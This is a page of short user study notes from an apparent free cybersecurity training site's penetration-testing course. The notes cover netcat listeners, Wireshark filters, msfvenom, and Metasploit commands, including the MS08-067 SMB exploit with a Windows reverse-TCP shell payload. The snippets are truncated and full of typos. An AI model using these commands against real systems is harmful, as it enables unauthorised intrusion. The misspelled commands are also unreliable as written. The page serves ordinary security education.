Advanced Penetration Testing Notes

listen for open ports on system

netstat -antp Check open port [view]

By: masterimpaler | Related Lesson: Linux (part 6) Copy Commands and crontab | Modified: July 25, 2017

netcat

netcat – tcp/ip swiss army knife Can listen on a port with netcat nc -lvp <port-number> [view]

By: masterimpaler | Related Lesson: Linux (part 5) IP Addressing and netcat | Modified: July 25, 2017

part 6

msfvenom cd /user/shearmetasploit-framecd cd root msfvenom -h   [view]

By: ali2141997 | Related Lesson: Metasploit (part 6) msfvenom | Modified: July 25, 2017

hak yükseltme

lokalden bilgi toplama süreçleri. [view]

By: bulten | Related Lesson: Post Exploitation (part 1) File Transfer without and Interactive Shell | Modified: July 25, 2017

post exploitation

and obfuscation [view]

By: bulten | Related Lesson: Advanced Exploitation (part 5) Bypassing Antivirus Software | Modified: July 25, 2017

Capture Traffic (pt 2) analyzing Network

Kali Tool : wireshark Capture>interfaces > Eth0 Uncheck Use promiscous mode (if on the same network) Open term. window- ping 192.16864.1.64 (example) filter: ftp &&ip.dst==192.168.1.64 Filter: ip.scr==192.168.1.64||ftp &&ip.dst= [view]

By: Oishi | Related Lesson: Traffic Capture (part 2) Analyzing Network Protocol with Wireshark | Modified: July 25, 2017

part 5

msfcli msfcli -h  msfcli exploit/windos/smb/ms08_067_netapi P  msfcli exploit/windos/smb/ms08_067_netapi payload”windows/sell/reverse_tcp 0 or msfcli exploit/windos/smb/ms08_067_netapi payload”windows/sell/reverse_tcp RHOST(ip) LHOST (i [view]

By: ali2141997 | Related Lesson: Metasploit (part 5) msfcli | Modified: July 24, 2017

part 4

Auxiliary Module use axiliary/scanner/amd/pipe_auditor show option set RHOST (IP) exploit    [view]

By: ali2141997 | Related Lesson: Metasploit (part 4) Auxiliary Module | Modified: July 24, 2017

part 3

Operation service postgresql start  service metasploit start  msfconsol and then opened windows to penteretion testing  help  www.metasploit.com search ms08-067  info exploit/windows/smb/ms08-067_netapi use exploit/windows/smb/ms08-067_netapi sh [view]

By: ali2141997 | Related Lesson: Metasploit (part 3) Operation | Modified: July 24, 2017

wireshark

ftp&&ip.dst==<ip addr here>  ip.src==ip addr || ip.dst==ip addr   promiscuous mode – all data packets are read by the network adapter  in a LAN. [view]

By: xzor | Related Lesson: Traffic Capture (part 2) Analyzing Network Protocol with Wireshark | Modified: July 24, 2017

« First ‹ Previous 1 12 102 110 111 112 113 114 122 212 243 Next › Last »

Our Revolution

We believe Cyber Security training should be free, for everyone, FOREVER. Everyone, everywhere, deserves the OPPORTUNITY to learn, begin and grow a career in this fascinating field. Therefore, Cybrary is a free community where people, companies and training come together to give everyone the ability to collaborate in an open source way that is revolutionizing the cyber security educational experience.

Support Cybrary

Donate Here to Get This Month's Donor Badge

 

We recommend always using caution when following any link

Are you sure you want to continue?

Continue
Cancel